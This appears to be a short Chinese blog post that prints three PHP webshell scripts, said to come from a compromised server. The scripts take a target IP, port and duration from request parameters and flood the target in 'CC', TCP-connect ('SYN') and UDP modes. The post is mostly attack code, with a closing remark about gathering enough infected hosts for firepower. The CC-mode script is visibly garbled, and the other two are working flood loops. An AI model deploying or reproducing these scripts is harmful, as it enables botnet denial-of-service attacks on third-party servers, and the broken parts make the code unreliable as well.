phpshell_ddos攻击型webshell

从一个被中招的老兄的服务器中找到一个php后门，看了一下内容，原来webshell可以这样用

此乃cc模式：

<?phperror_reporting(E_ALL);set_time_limit(0);ob_implicit_flush();$address = $_POST['site'];$port = $_POST['port'];$dongu = $_POST['dongu'];   //循环次数$sayi = 1;while ( $sayi <= $dongu ){if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {echo "HaHa\n";} if (socket_bind($sock, $address, $port) === false) {echo "HaHa\n";} if (socket_listen($sock, 5) === false) {echo "HaHa\n";}$msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection: Keep-Alive\r\n";socket_write($msg);socket_close($sock);                //这几句是核心功能$sayi++;echo "Goodbye...".$sayi;}?>

syn模式

<?phpini_set("display_errors", "Off");$packets = 0;$ip = $_GET['ip'];$port = $_GET['port'];set_time_limit(0);ignore_user_abort(FALSE);$exec_time = $_GET['time'];$time = time();print "状态 : 正常运行中.....<br>";$max_time = $time+$exec_time;while(1){$packets++;if(time() > $max_time){break;} $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);     //这几句是核心功能 }?>

udp模式

<?php$packets = 0;$ip = $_GET['ip'];$port = $_GET['port'];set_time_limit(0);ignore_user_abort(FALSE);$exec_time = $_GET['time'];$time = time();print "状态 : 正常运行中.....<br>";$max_time = $time+$exec_time;for($i=0;$i<65535;$i++){$out .= "phpddos";}while(1){$packets++;if(time() > $max_time){break;} $fp = fsockopen("udp://$ip", $port, $errno, $errstr, 5);   //这几句是核心功能if($fp){fwrite($fp, $out);fclose($fp);}}?>

这个后门的作者唯一要做的是通过大量的shell 入库处理，最后post或者get攻击目标到这个后门

但php环境一般都没开php_sockets.dll  这个模块  不知道 能收集多少开了的做火力